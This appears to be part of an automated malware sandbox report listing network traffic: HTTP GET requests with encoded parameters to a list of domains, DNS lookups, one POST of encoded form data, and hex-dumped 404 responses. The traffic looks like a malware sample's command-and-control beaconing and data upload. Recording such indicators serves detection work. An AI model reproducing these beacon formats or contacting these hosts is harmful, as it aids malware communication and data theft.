Source: global traffic | HTTP traffic detected: GET /0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.madhf.tech | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /g3h7/?rfJh=dyqW+SkpLS8uL5dSny8q8PjeDBZe49z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRpkPLcScFLLxAHuiMJY3F0pG7ioCFxuNP/M=&O258-=pHdHBdXhwLO HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.canadavinreport.site | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /t322/?rfJh=FCfXCbowRdQKA3bJwmXvc8lOOpkaFxffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR69fnaXkcIGP7N+ZF5LcImJ8BAL5CR7GLvE=&O258-=pHdHBdXhwLO HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.yunlekeji.top | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /iuvu/?rfJh=4GSi4NjhieA+eby3OKR9UHmAChFha0TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yneyjQ3W+H8Nz5kvkADuxuBf3arJIsYCs9inQ=&O258-=pHdHBdXhwLO HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.logidant.xyz | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /36be/?O258-=pHdHBdXhwLO&rfJh=zT+fCPSXWqCfWPgPkoP8augIhoSODsGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rERMucz0ZFCszNnC27qzdt1he7kDJbjieX8= HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.laohub10.net | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXIiiXeZyn2c+rOjHayKJI+/jeoNtslqItL4=&O258-=pHdHBdXhwLO HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.zkdamdjj.shop | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /k1td/?rfJh=oEMxw+ab8QlEZmTlDbCKptskN0q9+wMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTBaIFjRaD0WqdXDHZ0BQI5kG8sOnP1u2RJI=&O258-=pHdHBdXhwLO HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.tals.xyz | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /gn26/?rfJh=fgpTVhEuh+HnR3p3mfMFhWHWnuNeMM4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9KgaN0dmEc5ka6rkf4Wz0wYWqHeygGDkXS8=&O258-=pHdHBdXhwLO HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.brightvision.website | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.izmirescortg.xyz
Source: global traffic | DNS traffic detected: DNS query: www.aballanet.cat
Source: global traffic | DNS traffic detected: DNS query: www.madhf.tech
Source: global traffic | DNS traffic detected: DNS query: www.canadavinreport.site
Source: global traffic | DNS traffic detected: DNS query: www.yunlekeji.top
Source: global traffic | DNS traffic detected: DNS query: www.logidant.xyz
Source: global traffic | DNS traffic detected: DNS query: www.laohub10.net
Source: global traffic | DNS traffic detected: DNS query: www.zkdamdjj.shop
Source: global traffic | DNS traffic detected: DNS query: www.tals.xyz
Source: global traffic | DNS traffic detected: DNS query: www.brightvision.website
Source: unknown | HTTP traffic detected: POST /6xrr/ HTTP/1.1 | Accept: */* | Accept-Language: en-US | Accept-Encoding: gzip, deflate, br | Content-Length: 201 | Connection: close | Content-Type: application/x-www-form-urlencoded | Cache-Control: max-age=0 | Host: www.aballanet.cat | Origin: http://www.aballanet.cat | Referer: http://www.aballanet.cat/6xrr/ | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 | Data Raw: 72 66 4a 68 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 43 58 30 62 58 4b 50 4f 51 69 4f 76 45 2f 2b 63 7a 65 52 43 44 6b 78 67 45 41 73 51 41 36 75 68 41 3d 3d | Data Ascii: rfJh=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4CX0bXKPOQiOvE/+czeRCDkxgEAsQA6uhA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:54:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gg9CNp9BliKKfIzIleuGRo2sgboe1DjNSITzUh%2BvaLmdbEwkg6NlbPctPgy1vZ8G09NQKQ6E2%2F%2B%2B7qkfrAxKu4YK74mchpcIUWlwP6dOCjjiUqM8XdEo2YHCqwr2Kl3xTksM0Jh3cw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec14ce66f67431a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2685&min_rtt=2685&rtt_var=1342&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=367&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found 
on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:54:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 
70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:54:31 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 
70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 05:55:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 39 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 
20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 05:55:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 05:55:33 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
